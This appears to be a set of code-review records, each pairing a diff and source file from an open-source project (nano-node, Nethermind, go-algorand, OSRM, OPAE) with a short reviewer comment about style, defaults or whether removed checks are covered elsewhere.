nano::unchecked_info unchecked_info (block, account, 0, nano::signature_verification::unknown); node2.node->block_processor.add (unchecked_info); // Retrieving previous block hash hash = block->previous (); } } } } count = 0; uint64_t block_count_2 (0); while (block_count_2 != block_count) { std::this_thread::sleep_for (std::chrono::seconds (1)); auto transaction_2 (node2.node->store.tx_begin ()); block_count_2 = node2.node->store.block_count (transaction_2).sum (); if ((count % 60) == 0) { std::cout << boost::str (boost::format ("%1% (%2%) blocks processed") % block_count_2 % node2.node->store.unchecked_count (transaction_2)) << std::endl; } count++; } auto end (std::chrono::high_resolution_clock::now ()); auto time (std::chrono::duration_cast<std::chrono::microseconds> (end - begin).count ()); auto seconds (time / 1000000); nano::remove_temporary_directories (); std::cout << boost::str (boost::format ("%|1$ 12d| seconds \n%2% blocks per second") % seconds % (block_count / seconds)) << std::endl; } else if (vm.count ("debug_peers")) { nano::inactive_node node (data_path); auto transaction (node.node->store.tx_begin ()); for (auto i (node.node->store.peers_begin (transaction)), n (node.node->store.peers_end ()); i != n; ++i) { std::cout << boost::str (boost::format ("%1%\n") % nano::endpoint (boost::asio::ip::address_v6 (i->first.address_bytes ()), i->first.port ())); } } else if (vm.count ("version")) { if (NANO_VERSION_PATCH == 0) { std::cout << "Version " << NANO_MAJOR_MINOR_VERSION << std::endl; } else { std::cout << "Version " << NANO_MAJOR_MINOR_RC_VERSION << std::endl; } } else { std::cout << description << std::endl; result = -1; } } return result; }
1
15,140
"default 65536" Not sure if it's important to state, but block_processor_full_size has a different default for fast_bootstrap.
nanocurrency-nano-node
cpp
@@ -23,5 +23,6 @@ namespace Nethermind.TxPool public uint FutureNonceRetention { get; set; } = 16; public int HashCacheSize { get; set; } = 512 * 1024; public long? GasLimit { get; set; } = null; + } }
1
// Copyright (c) 2021 Demerzel Solutions Limited // This file is part of the Nethermind library. // // The Nethermind library is free software: you can redistribute it and/or modify // it under the terms of the GNU Lesser General Public License as published by // the Free Software Foundation, either version 3 of the License, or // (at your option) any later version. // // The Nethermind library is distributed in the hope that it will be useful, // but WITHOUT ANY WARRANTY; without even the implied warranty of // MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the // GNU Lesser General Public License for more details. // // You should have received a copy of the GNU Lesser General Public License // along with the Nethermind. If not, see <http://www.gnu.org/licenses/>. namespace Nethermind.TxPool { public class TxPoolConfig : ITxPoolConfig { public int PeerNotificationThreshold { get; set; } = 5; public int Size { get; set; } = 2048; public uint FutureNonceRetention { get; set; } = 16; public int HashCacheSize { get; set; } = 512 * 1024; public long? GasLimit { get; set; } = null; } }
1
25,415
remove unnecessary whitespace changes
NethermindEth-nethermind
.cs
@@ -46,10 +46,6 @@ func TxnPool(s *transactions.SignedTxn, spec transactions.SpecialAddresses, prot return errors.New("empty address") } - if s.Sig != (crypto.Signature{}) && !s.Msig.Blank() { - return errors.New("signedtxn should only have one of Sig or Msig") - } - outCh := make(chan error, 1) cx := asyncVerifyContext{s, outCh, &proto} verificationPool.EnqueueBacklog(context.Background(), stxnAsyncVerify, &cx, nil)
1
// Copyright (C) 2019 Algorand, Inc. // This file is part of go-algorand // // go-algorand is free software: you can redistribute it and/or modify // it under the terms of the GNU Affero General Public License as // published by the Free Software Foundation, either version 3 of the // License, or (at your option) any later version. // // go-algorand is distributed in the hope that it will be useful, // but WITHOUT ANY WARRANTY; without even the implied warranty of // MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the // GNU Affero General Public License for more details. // // You should have received a copy of the GNU Affero General Public License // along with go-algorand. If not, see <https://www.gnu.org/licenses/>. package verify import ( "context" "encoding/binary" "errors" "fmt" "github.com/algorand/go-algorand/config" "github.com/algorand/go-algorand/crypto" "github.com/algorand/go-algorand/data/basics" "github.com/algorand/go-algorand/data/transactions" "github.com/algorand/go-algorand/data/transactions/logic" "github.com/algorand/go-algorand/util/execpool" ) // TxnPool verifies that a SignedTxn has a good signature and that the underlying // transaction is properly constructed. // Note that this does not check whether a payset is valid against the ledger: // a SignedTxn may be well-formed, but a payset might contain an overspend. // // This version of verify is performing the verification over the provided execution pool. 
func TxnPool(s *transactions.SignedTxn, spec transactions.SpecialAddresses, proto config.ConsensusParams, verificationPool execpool.BacklogPool) error { if err := s.Txn.WellFormed(spec, proto); err != nil { return err } zeroAddress := basics.Address{} if s.Txn.Src() == zeroAddress { return errors.New("empty address") } if s.Sig != (crypto.Signature{}) && !s.Msig.Blank() { return errors.New("signedtxn should only have one of Sig or Msig") } outCh := make(chan error, 1) cx := asyncVerifyContext{s, outCh, &proto} verificationPool.EnqueueBacklog(context.Background(), stxnAsyncVerify, &cx, nil) if err, hasErr := <-outCh; hasErr { return err } return nil } // Txn verifies a SignedTxn as being signed and having no obviously inconsistent data. // Block-assembly time checks of LogicSig and accounting rules may still block the txn. func Txn(s *transactions.SignedTxn, spec transactions.SpecialAddresses, proto config.ConsensusParams) error { if err := s.Txn.WellFormed(spec, proto); err != nil { return err } zeroAddress := basics.Address{} if s.Txn.Src() == zeroAddress { return errors.New("empty address") } return stxnVerifyCore(s, &proto) } type asyncVerifyContext struct { s *transactions.SignedTxn outCh chan error proto *config.ConsensusParams } func stxnAsyncVerify(arg interface{}) interface{} { cx := arg.(*asyncVerifyContext) err := stxnVerifyCore(cx.s, cx.proto) if err != nil { cx.outCh <- err } else { close(cx.outCh) } return nil } func stxnVerifyCore(s *transactions.SignedTxn, proto *config.ConsensusParams) error { numSigs := 0 hasSig := false hasMsig := false hasLogicSig := false if s.Sig != (crypto.Signature{}) { numSigs++ hasSig = true } if !s.Msig.Blank() { numSigs++ hasMsig = true } if !s.Lsig.Blank() { numSigs++ hasLogicSig = true } if numSigs == 0 { return errors.New("signedtxn has no sig") } if numSigs > 1 { return errors.New("signedtxn should only have one of Sig or Msig or LogicSig") } if hasSig { if crypto.SignatureVerifier(s.Txn.Src()).Verify(s.Txn, s.Sig) { 
return nil } return errors.New("signature validation failed") } if hasMsig { if ok, _ := crypto.MultisigVerify(s.Txn, crypto.Digest(s.Txn.Src()), s.Msig); ok { return nil } return errors.New("multisig validation failed") } if hasLogicSig { return LogicSig(&s.Lsig, proto, s) } return errors.New("has one mystery sig. WAT?") } // LogicSig checks that the signature is valid and that the program is basically well formed. // It does not evaluate the logic. func LogicSig(lsig *transactions.LogicSig, proto *config.ConsensusParams, stxn *transactions.SignedTxn) error { if len(lsig.Logic) == 0 { return errors.New("LogicSig.Logic empty") } version, vlen := binary.Uvarint(lsig.Logic) if vlen <= 0 { return errors.New("LogicSig.Logic bad version") } if version > proto.LogicSigVersion { return errors.New("LogicSig.Logic version too new") } if uint64(lsig.Len()) > proto.LogicSigMaxSize { return errors.New("LogicSig.Logic too long") } ep := logic.EvalParams{Txn: stxn, Proto: proto} cost, err := logic.Check(lsig.Logic, ep) if err != nil { return err } if cost > int(proto.LogicSigMaxCost) { return fmt.Errorf("LogicSig.Logic too slow, %d > %d", cost, proto.LogicSigMaxCost) } hasSig := false hasMsig := false numSigs := 0 if lsig.Sig != (crypto.Signature{}) { hasSig = true numSigs++ } if !lsig.Msig.Blank() { hasMsig = true numSigs++ } if numSigs == 0 { // if the txn.Sender == hash(Logic) then this is a (potentially) valid operation on a contract-only account program := transactions.Program(lsig.Logic) lhash := crypto.HashObj(&program) if crypto.Digest(stxn.Txn.Sender) == lhash { return nil } return errors.New("LogicNot signed and not a Logic-only account") } if numSigs > 1 { return errors.New("LogicSig should only have one of Sig or Msig but has more than one") } if hasSig { program := transactions.Program(lsig.Logic) if crypto.SignatureVerifier(stxn.Txn.Src()).Verify(&program, lsig.Sig) { return nil } return errors.New("logic signature validation failed") } if hasMsig { program := 
transactions.Program(lsig.Logic) if ok, _ := crypto.MultisigVerify(&program, crypto.Digest(stxn.Txn.Src()), lsig.Msig); ok { return nil } return errors.New("logic multisig validation failed") } return errors.New("inconsistent internal state verifying LogicSig") }
1
36,470
Are these conditions covered elsewhere ?
algorand-go-algorand
go
@@ -59,7 +59,14 @@ TurnType::Enum IntersectionHandler::findBasicTurnType(const EdgeID via_edge, if (!on_ramp && onto_ramp) return TurnType::OnRamp; - if (in_data.name_id == out_data.name_id && in_data.name_id != EMPTY_NAMEID) + const auto same_name = + !util::guidance::requiresNameAnnounced(name_table.GetNameForID(in_data.name_id), + name_table.GetRefForID(in_data.name_id), + name_table.GetNameForID(out_data.name_id), + name_table.GetRefForID(out_data.name_id), + street_name_suffix_table); + + if (in_data.name_id != EMPTY_NAMEID && out_data.name_id != EMPTY_NAMEID && same_name) { return TurnType::Continue; }
1
#include "extractor/guidance/intersection_handler.hpp" #include "extractor/guidance/constants.hpp" #include "extractor/guidance/toolkit.hpp" #include "util/coordinate_calculation.hpp" #include "util/guidance/toolkit.hpp" #include "util/simple_logger.hpp" #include <algorithm> #include <cstddef> using EdgeData = osrm::util::NodeBasedDynamicGraph::EdgeData; using osrm::util::guidance::getTurnDirection; namespace osrm { namespace extractor { namespace guidance { namespace detail { inline bool requiresAnnouncement(const EdgeData &from, const EdgeData &to) { return !from.CanCombineWith(to); } } IntersectionHandler::IntersectionHandler(const util::NodeBasedDynamicGraph &node_based_graph, const std::vector<QueryNode> &node_info_list, const util::NameTable &name_table, const SuffixTable &street_name_suffix_table, const IntersectionGenerator &intersection_generator) : node_based_graph(node_based_graph), node_info_list(node_info_list), name_table(name_table), street_name_suffix_table(street_name_suffix_table), intersection_generator(intersection_generator) { } std::size_t IntersectionHandler::countValid(const Intersection &intersection) const { return std::count_if(intersection.begin(), intersection.end(), [](const ConnectedRoad &road) { return road.entry_allowed; }); } TurnType::Enum IntersectionHandler::findBasicTurnType(const EdgeID via_edge, const ConnectedRoad &road) const { const auto &in_data = node_based_graph.GetEdgeData(via_edge); const auto &out_data = node_based_graph.GetEdgeData(road.eid); bool on_ramp = in_data.road_classification.IsRampClass(); bool onto_ramp = out_data.road_classification.IsRampClass(); if (!on_ramp && onto_ramp) return TurnType::OnRamp; if (in_data.name_id == out_data.name_id && in_data.name_id != EMPTY_NAMEID) { return TurnType::Continue; } return TurnType::Turn; } TurnInstruction IntersectionHandler::getInstructionForObvious(const std::size_t num_roads, const EdgeID via_edge, const bool through_street, const ConnectedRoad &road) const { 
const auto type = findBasicTurnType(via_edge, road); // handle travel modes: const auto in_mode = node_based_graph.GetEdgeData(via_edge).travel_mode; const auto out_mode = node_based_graph.GetEdgeData(road.eid).travel_mode; if (type == TurnType::OnRamp) { return {TurnType::OnRamp, getTurnDirection(road.angle)}; } if (angularDeviation(road.angle, 0) < 0.01) { return {TurnType::Turn, DirectionModifier::UTurn}; } if (type == TurnType::Turn) { const auto &in_data = node_based_graph.GetEdgeData(via_edge); const auto &out_data = node_based_graph.GetEdgeData(road.eid); if (in_data.name_id != out_data.name_id && util::guidance::requiresNameAnnounced(name_table.GetNameForID(in_data.name_id), name_table.GetRefForID(in_data.name_id), name_table.GetNameForID(out_data.name_id), name_table.GetRefForID(out_data.name_id), street_name_suffix_table)) { // obvious turn onto a through street is a merge if (through_street) { // We reserve merges for motorway types. All others are considered for simply going // straight onto a road. This avoids confusion about merge directions on streets // that could potentially also offer different choices if (out_data.road_classification.IsMotorwayClass()) return {TurnType::Merge, road.angle > STRAIGHT_ANGLE ? DirectionModifier::SlightRight : DirectionModifier::SlightLeft}; else if (in_data.road_classification.IsRampClass() && out_data.road_classification.IsRampClass()) { // This check is more a precaution than anything else. Our current travel modes // cannot reach this, since all ramps are exposing the same travel type. But we // could see toll-type at some point. return {in_mode == out_mode ? TurnType::Suppressed : TurnType::Notification, getTurnDirection(road.angle)}; } else { const double constexpr MAX_COLLAPSE_DISTANCE = 30; // in normal road condidtions, we check if the turn is nearly straight. // Doing so, we widen the angle that a turn is considered straight, but since it // is obvious, the choice is arguably better. 
// FIXME this requires https://github.com/Project-OSRM/osrm-backend/pull/2399, // since `distance` does not refer to an actual distance but rather to the // duration/weight of the traversal. We can only approximate the distance here // or actually follow the full road. When 2399 lands, we can exchange here for a // precalculated distance value. const auto distance = util::coordinate_calculation::haversineDistance( node_info_list[node_based_graph.GetTarget(via_edge)], node_info_list[node_based_graph.GetTarget(road.eid)]); return { TurnType::Turn, (angularDeviation(road.angle, STRAIGHT_ANGLE) < FUZZY_ANGLE_DIFFERENCE || distance > 2 * MAX_COLLAPSE_DISTANCE) ? DirectionModifier::Straight : getTurnDirection(road.angle)}; } } else { return {in_mode == out_mode ? TurnType::NewName : TurnType::Notification, getTurnDirection(road.angle)}; } } // name has not changed, suppress a turn here or indicate mode change else { return {in_mode == out_mode ? TurnType::Suppressed : TurnType::Notification, getTurnDirection(road.angle)}; } } BOOST_ASSERT(type == TurnType::Continue); if (in_mode != out_mode) { return {TurnType::Notification, getTurnDirection(road.angle)}; } if (num_roads > 2) { return {TurnType::Suppressed, getTurnDirection(road.angle)}; } else { return {TurnType::NoTurn, getTurnDirection(road.angle)}; } } void IntersectionHandler::assignFork(const EdgeID via_edge, ConnectedRoad &left, ConnectedRoad &right) const { const auto &in_data = node_based_graph.GetEdgeData(via_edge); const bool low_priority_left = node_based_graph.GetEdgeData(left.eid).road_classification.IsLowPriorityRoadClass(); const bool low_priority_right = node_based_graph.GetEdgeData(right.eid).road_classification.IsLowPriorityRoadClass(); if ((angularDeviation(left.angle, STRAIGHT_ANGLE) < MAXIMAL_ALLOWED_NO_TURN_DEVIATION && angularDeviation(right.angle, STRAIGHT_ANGLE) > FUZZY_ANGLE_DIFFERENCE)) { // left side is actually straight const auto &out_data = node_based_graph.GetEdgeData(left.eid); if 
(detail::requiresAnnouncement(in_data, out_data)) { if (low_priority_right && !low_priority_left) { left.instruction = getInstructionForObvious(3, via_edge, false, left); right.instruction = {findBasicTurnType(via_edge, right), DirectionModifier::SlightRight}; } else { if (low_priority_left && !low_priority_right) { left.instruction = {findBasicTurnType(via_edge, left), DirectionModifier::SlightLeft}; right.instruction = {findBasicTurnType(via_edge, right), DirectionModifier::SlightRight}; } else { left.instruction = {TurnType::Fork, DirectionModifier::SlightLeft}; right.instruction = {TurnType::Fork, DirectionModifier::SlightRight}; } } } else { left.instruction = {TurnType::Suppressed, DirectionModifier::Straight}; right.instruction = {findBasicTurnType(via_edge, right), DirectionModifier::SlightRight}; } } else if (angularDeviation(right.angle, STRAIGHT_ANGLE) < MAXIMAL_ALLOWED_NO_TURN_DEVIATION && angularDeviation(left.angle, STRAIGHT_ANGLE) > FUZZY_ANGLE_DIFFERENCE) { // right side is actually straight const auto &out_data = node_based_graph.GetEdgeData(right.eid); if (angularDeviation(right.angle, STRAIGHT_ANGLE) < MAXIMAL_ALLOWED_NO_TURN_DEVIATION && angularDeviation(left.angle, STRAIGHT_ANGLE) > FUZZY_ANGLE_DIFFERENCE) { if (detail::requiresAnnouncement(in_data, out_data)) { if (low_priority_left && !low_priority_right) { left.instruction = {findBasicTurnType(via_edge, left), DirectionModifier::SlightLeft}; right.instruction = getInstructionForObvious(3, via_edge, false, right); } else { if (low_priority_right && !low_priority_left) { left.instruction = {findBasicTurnType(via_edge, left), DirectionModifier::SlightLeft}; right.instruction = {findBasicTurnType(via_edge, right), DirectionModifier::SlightRight}; } else { right.instruction = {TurnType::Fork, DirectionModifier::SlightRight}; left.instruction = {TurnType::Fork, DirectionModifier::SlightLeft}; } } } else { right.instruction = {TurnType::Suppressed, DirectionModifier::Straight}; left.instruction = 
{findBasicTurnType(via_edge, left), DirectionModifier::SlightLeft}; } } } // left side of fork if (low_priority_right && !low_priority_left) left.instruction = {TurnType::Suppressed, DirectionModifier::SlightLeft}; else { if (low_priority_left && !low_priority_right) left.instruction = {TurnType::Turn, DirectionModifier::SlightLeft}; else left.instruction = {TurnType::Fork, DirectionModifier::SlightLeft}; } // right side of fork if (low_priority_left && !low_priority_right) right.instruction = {TurnType::Suppressed, DirectionModifier::SlightLeft}; else { if (low_priority_right && !low_priority_left) right.instruction = {TurnType::Turn, DirectionModifier::SlightRight}; else right.instruction = {TurnType::Fork, DirectionModifier::SlightRight}; } } void IntersectionHandler::assignFork(const EdgeID via_edge, ConnectedRoad &left, ConnectedRoad &center, ConnectedRoad &right) const { // TODO handle low priority road classes in a reasonable way if (left.entry_allowed && center.entry_allowed && right.entry_allowed) { left.instruction = {TurnType::Fork, DirectionModifier::SlightLeft}; if (angularDeviation(center.angle, 180) < MAXIMAL_ALLOWED_NO_TURN_DEVIATION) { const auto &in_data = node_based_graph.GetEdgeData(via_edge); const auto &out_data = node_based_graph.GetEdgeData(center.eid); if (detail::requiresAnnouncement(in_data, out_data)) { center.instruction = {TurnType::Fork, DirectionModifier::Straight}; } else { center.instruction = {TurnType::Suppressed, DirectionModifier::Straight}; } } else { center.instruction = {TurnType::Fork, DirectionModifier::Straight}; } right.instruction = {TurnType::Fork, DirectionModifier::SlightRight}; } else if (left.entry_allowed) { if (right.entry_allowed) assignFork(via_edge, left, right); else if (center.entry_allowed) assignFork(via_edge, left, center); else left.instruction = {findBasicTurnType(via_edge, left), getTurnDirection(left.angle)}; } else if (right.entry_allowed) { if (center.entry_allowed) assignFork(via_edge, center, 
right); else right.instruction = {findBasicTurnType(via_edge, right), getTurnDirection(right.angle)}; } else { if (center.entry_allowed) center.instruction = {findBasicTurnType(via_edge, center), getTurnDirection(center.angle)}; } } void IntersectionHandler::assignTrivialTurns(const EdgeID via_eid, Intersection &intersection, const std::size_t begin, const std::size_t end) const { for (std::size_t index = begin; index != end; ++index) if (intersection[index].entry_allowed) intersection[index].instruction = {findBasicTurnType(via_eid, intersection[index]), getTurnDirection(intersection[index].angle)}; } bool IntersectionHandler::isThroughStreet(const std::size_t index, const Intersection &intersection) const { if (node_based_graph.GetEdgeData(intersection[index].eid).name_id == EMPTY_NAMEID) return false; const auto &data_at_index = node_based_graph.GetEdgeData(intersection[index].eid); // a through street cannot start at our own position -> index 1 for (std::size_t road_index = 1; road_index < intersection.size(); ++road_index) { if (road_index == index) continue; const auto &road = intersection[road_index]; const auto &road_data = node_based_graph.GetEdgeData(road.eid); // roads have a near straight angle (180 degree) const bool is_nearly_straight = angularDeviation(road.angle, intersection[index].angle) > (STRAIGHT_ANGLE - FUZZY_ANGLE_DIFFERENCE); const bool have_same_name = data_at_index.name_id == road_data.name_id; const bool have_same_category = data_at_index.road_classification == road_data.road_classification; if (is_nearly_straight && have_same_name && have_same_category) return true; } return false; } std::size_t IntersectionHandler::findObviousTurn(const EdgeID via_edge, const Intersection &intersection) const { // no obvious road if (intersection.size() == 1) return 0; // a single non u-turn is obvious if (intersection.size() == 2) return 1; // at least three roads std::size_t best = 0; double best_deviation = 180; std::size_t best_continue = 0; double 
best_continue_deviation = 180; const EdgeData &in_data = node_based_graph.GetEdgeData(via_edge); const auto in_classification = in_data.road_classification; for (std::size_t i = 1; i < intersection.size(); ++i) { const double deviation = angularDeviation(intersection[i].angle, STRAIGHT_ANGLE); if (!intersection[i].entry_allowed) continue; const auto out_data = node_based_graph.GetEdgeData(intersection[i].eid); const auto continue_class = node_based_graph.GetEdgeData(intersection[best_continue].eid).road_classification; if (out_data.name_id == in_data.name_id && (best_continue == 0 || (continue_class.GetPriority() > out_data.road_classification.GetPriority() && in_classification != continue_class) || (deviation < best_continue_deviation && out_data.road_classification == continue_class) || (continue_class != in_classification && out_data.road_classification == continue_class))) { best_continue_deviation = deviation; best_continue = i; } const auto current_best_class = node_based_graph.GetEdgeData(intersection[best_continue].eid).road_classification; // don't prefer low priority classes if (best != 0 && out_data.road_classification.IsLowPriorityRoadClass() && !current_best_class.IsLowPriorityRoadClass()) continue; const bool is_better_choice_by_priority = best == 0 || obviousByRoadClass(in_data.road_classification, out_data.road_classification, current_best_class); const bool other_is_better_choice_by_priority = best != 0 && obviousByRoadClass(in_data.road_classification, current_best_class, out_data.road_classification); if ((!other_is_better_choice_by_priority && deviation < best_deviation) || is_better_choice_by_priority) { best_deviation = deviation; best = i; } } // We don't consider empty names a valid continue feature. This distinguishes between missing // names and actual continuing roads. 
if (in_data.name_id == EMPTY_NAMEID) best_continue = 0; if (best == 0) return 0; const std::pair<std::int64_t, std::int64_t> num_continue_names = [&]() { std::int64_t count = 0, count_valid = 0; if (in_data.name_id != EMPTY_NAMEID) { for (std::size_t i = 1; i < intersection.size(); ++i) { const auto &road = intersection[i]; if ((in_data.name_id == node_based_graph.GetEdgeData(road.eid).name_id)) { ++count; if (road.entry_allowed) ++count_valid; } } } return std::make_pair(count, count_valid); }(); if (0 != best_continue && best != best_continue && angularDeviation(intersection[best].angle, STRAIGHT_ANGLE) < MAXIMAL_ALLOWED_NO_TURN_DEVIATION && node_based_graph.GetEdgeData(intersection[best_continue].eid).road_classification == node_based_graph.GetEdgeData(intersection[best].eid).road_classification) { // if the best angle is going straight but the road is turning, we don't name anything // obvious return 0; } const bool all_continues_are_narrow = [&]() { if (in_data.name_id == EMPTY_NAMEID) return false; return std::count_if( intersection.begin() + 1, intersection.end(), [&](const ConnectedRoad &road) { return (in_data.name_id == node_based_graph.GetEdgeData(road.eid).name_id) && angularDeviation(road.angle, STRAIGHT_ANGLE) < NARROW_TURN_ANGLE; }) == num_continue_names.first; }(); // has no obvious continued road const auto &best_data = node_based_graph.GetEdgeData(intersection[best].eid); const auto check_non_continue = [&]() { // no continue road exists if (best_continue == 0) return true; // we have multiple continues and not all are narrow (treat all the same) if (!all_continues_are_narrow && (num_continue_names.first >= 2 && intersection.size() >= 4)) return true; // if the best continue is not narrow and we also have at least 2 possible choices, the // intersection size does not matter anymore if (num_continue_names.second >= 2 && best_continue_deviation >= 2 * NARROW_TURN_ANGLE) return true; // continue data now most certainly exists const auto 
&continue_data = node_based_graph.GetEdgeData(intersection[best_continue].eid); if (obviousByRoadClass(in_data.road_classification, continue_data.road_classification, best_data.road_classification)) return false; if (obviousByRoadClass(in_data.road_classification, best_data.road_classification, continue_data.road_classification)) return true; // the best deviation is very straight and not a ramp if (best_deviation < best_continue_deviation && best_deviation < FUZZY_ANGLE_DIFFERENCE && !best_data.road_classification.IsRampClass()) return true; // the continue road is of a lower priority, while the road continues on the same priority // with a better angle if (best_deviation < best_continue_deviation && in_data.road_classification == best_data.road_classification && continue_data.road_classification.GetPriority() > best_data.road_classification.GetPriority()) return true; return false; }(); if (check_non_continue) { // Find left/right deviation // skipping over service roads const std::size_t left_index = [&]() { const auto index_candidate = (best + 1) % intersection.size(); if (index_candidate == 0) return index_candidate; const auto &candidate_data = node_based_graph.GetEdgeData(intersection[index_candidate].eid); if (obviousByRoadClass(in_data.road_classification, best_data.road_classification, candidate_data.road_classification)) return (index_candidate + 1) % intersection.size(); else return index_candidate; }(); const auto right_index = [&]() { BOOST_ASSERT(best > 0); const auto index_candidate = best - 1; if (index_candidate == 0) return index_candidate; const auto candidate_data = node_based_graph.GetEdgeData(intersection[index_candidate].eid); if (obviousByRoadClass(in_data.road_classification, best_data.road_classification, candidate_data.road_classification)) return index_candidate - 1; else return index_candidate; }(); const double left_deviation = angularDeviation(intersection[left_index].angle, STRAIGHT_ANGLE); const double right_deviation = 
angularDeviation(intersection[right_index].angle, STRAIGHT_ANGLE); if (best_deviation < MAXIMAL_ALLOWED_NO_TURN_DEVIATION && std::min(left_deviation, right_deviation) > FUZZY_ANGLE_DIFFERENCE) return best; const auto &left_data = node_based_graph.GetEdgeData(intersection[left_index].eid); const auto &right_data = node_based_graph.GetEdgeData(intersection[right_index].eid); const bool obvious_to_left = left_index == 0 || obviousByRoadClass(in_data.road_classification, best_data.road_classification, left_data.road_classification); const bool obvious_to_right = right_index == 0 || obviousByRoadClass(in_data.road_classification, best_data.road_classification, right_data.road_classification); // if the best turn isn't narrow, but there is a nearly straight turn, we don't consider the // turn obvious const auto check_narrow = [&intersection, best_deviation](const std::size_t index) { return angularDeviation(intersection[index].angle, STRAIGHT_ANGLE) <= FUZZY_ANGLE_DIFFERENCE && (best_deviation > NARROW_TURN_ANGLE || intersection[index].entry_allowed); }; // other narrow turns? if (check_narrow(right_index) && !obvious_to_right) return 0; if (check_narrow(left_index) && !obvious_to_left) return 0; // check if a turn is distinct enough const auto isDistinct = [&](const std::size_t index, const double deviation) { /* If the neighbor is not possible to enter, we allow for a lower distinction rate. If the road category is smaller, its also adjusted. Only roads of the same priority require the full distinction ratio. 
*/ const auto adjusted_distinction_ratio = [&]() { // not allowed competitors are easily distinct if (!intersection[index].entry_allowed) return 0.7 * DISTINCTION_RATIO; // a bit less obvious are road classes else if (in_data.road_classification == best_data.road_classification && best_data.road_classification.GetPriority() < node_based_graph.GetEdgeData(intersection[index].eid) .road_classification.GetPriority()) return 0.8 * DISTINCTION_RATIO; // if road classes are the same, we use the full ratio else return DISTINCTION_RATIO; }(); return index == 0 || deviation / best_deviation >= adjusted_distinction_ratio || (deviation <= NARROW_TURN_ANGLE && !intersection[index].entry_allowed); }; const bool distinct_to_left = isDistinct(left_index, left_deviation); const bool distinct_to_right = isDistinct(right_index, right_deviation); // Well distinct turn that is nearly straight if ((distinct_to_left || obvious_to_left) && (distinct_to_right || obvious_to_right)) return best; } else { const double deviation = angularDeviation(intersection[best_continue].angle, STRAIGHT_ANGLE); const auto &continue_data = node_based_graph.GetEdgeData(intersection[best_continue].eid); if (std::abs(deviation) < 1) return best_continue; // check if any other similar best continues exist for (std::size_t i = 1; i < intersection.size(); ++i) { if (i == best_continue || !intersection[i].entry_allowed) continue; const auto &turn_data = node_based_graph.GetEdgeData(intersection[i].eid); const bool is_obvious_by_road_class = obviousByRoadClass(in_data.road_classification, continue_data.road_classification, turn_data.road_classification); // if the main road is obvious by class, we ignore the current road as a potential // prevention of obviousness if (is_obvious_by_road_class) continue; // continuation could be grouped with a straight turn and the turning road is a ramp if (turn_data.road_classification.IsRampClass() && deviation < GROUP_ANGLE) continue; // perfectly straight turns prevent 
obviousness const auto turn_deviation = angularDeviation(intersection[i].angle, STRAIGHT_ANGLE); if (turn_deviation < FUZZY_ANGLE_DIFFERENCE) return 0; const auto deviation_ratio = turn_deviation / deviation; // in comparison to normal devitions, a continue road can offer a smaller distinction // ratio. Other roads close to the turn angle are not as obvious, if one road continues. if (deviation_ratio < DISTINCTION_RATIO / 1.5) return 0; /* in comparison to another continuing road, we need a better distinction. This prevents situations where the turn is probably less obvious. An example are places that have a road with the same name entering/exiting: d / / a -- b \ \ c */ if (turn_data.name_id == continue_data.name_id && deviation_ratio < 1.5 * DISTINCTION_RATIO) return 0; } // Segregated intersections can result in us finding an obvious turn, even though its only // obvious due to a very short segment in between. So if the segment coming in is very // short, we check the previous intersection for other continues in the opposite bearing. const auto node_at_intersection = node_based_graph.GetTarget(via_edge); const util::Coordinate coordinate_at_intersection = node_info_list[node_at_intersection]; const auto node_at_u_turn = node_based_graph.GetTarget(intersection[0].eid); const util::Coordinate coordinate_at_u_turn = node_info_list[node_at_u_turn]; const double constexpr MAX_COLLAPSE_DISTANCE = 30; if (util::coordinate_calculation::haversineDistance( coordinate_at_intersection, coordinate_at_u_turn) < MAX_COLLAPSE_DISTANCE) { // this request here actually goes against the direction of the ingoing edgeid. This can // even reverse the direction. Since we don't want to compute actual turns but simply // try to find whether there is a turn going to the opposite direction of our obvious // turn, this should be alright. 
const auto previous_intersection = intersection_generator.GetActualNextIntersection( node_at_intersection, intersection[0].eid, nullptr, nullptr); const auto continue_road = intersection[best_continue]; for (const auto &comparison_road : previous_intersection) { // since we look at the intersection in the wrong direction, a similar angle // actually represents a near 180 degree different in bearings between the two // roads. So if there is a road that is enterable in the opposite direction just // prior, a turn is not obvious const auto &turn_data = node_based_graph.GetEdgeData(comparison_road.eid); if (angularDeviation(comparison_road.angle, STRAIGHT_ANGLE) > GROUP_ANGLE && angularDeviation(comparison_road.angle, continue_road.angle) < FUZZY_ANGLE_DIFFERENCE && !turn_data.reversed && continue_data.CanCombineWith(turn_data)) return 0; } } return best_continue; } return 0; } } // namespace guidance } // namespace extractor } // namespace osrm
1
17,831
the above check (by transitivity) checked for `in_data.name_id == out_data.name_id && in_data.name_id != EMPTY_NAME_ID && out_data.name_id != EMPTY_NAME_ID`. The final check of `out_data.name_id != EMPTY_NAME_ID` is missing now.
Project-OSRM-osrm-backend
cpp
@@ -583,6 +583,11 @@ out_free: fpga_result __FPGA_API__ fpgaDestroyEventHandle(fpga_event_handle *event_handle) { + //sanity check + if (!event_handle) { + return FPGA_INVALID_PARAM; + } + struct _fpga_event_handle *_eh = (struct _fpga_event_handle *) *event_handle; fpga_result result = FPGA_OK; int err = 0;
1
// Copyright(c) 2017, Intel Corporation // // Redistribution and use in source and binary forms, with or without // modification, are permitted provided that the following conditions are met: // // * Redistributions of source code must retain the above copyright notice, // this list of conditions and the following disclaimer. // * Redistributions in binary form must reproduce the above copyright notice, // this list of conditions and the following disclaimer in the documentation // and/or other materials provided with the distribution. // * Neither the name of Intel Corporation nor the names of its contributors // may be used to endorse or promote products derived from this software // without specific prior written permission. // // THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" // AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE // IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE // ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE // LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR // CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF // SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS // INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN // CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) // ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, 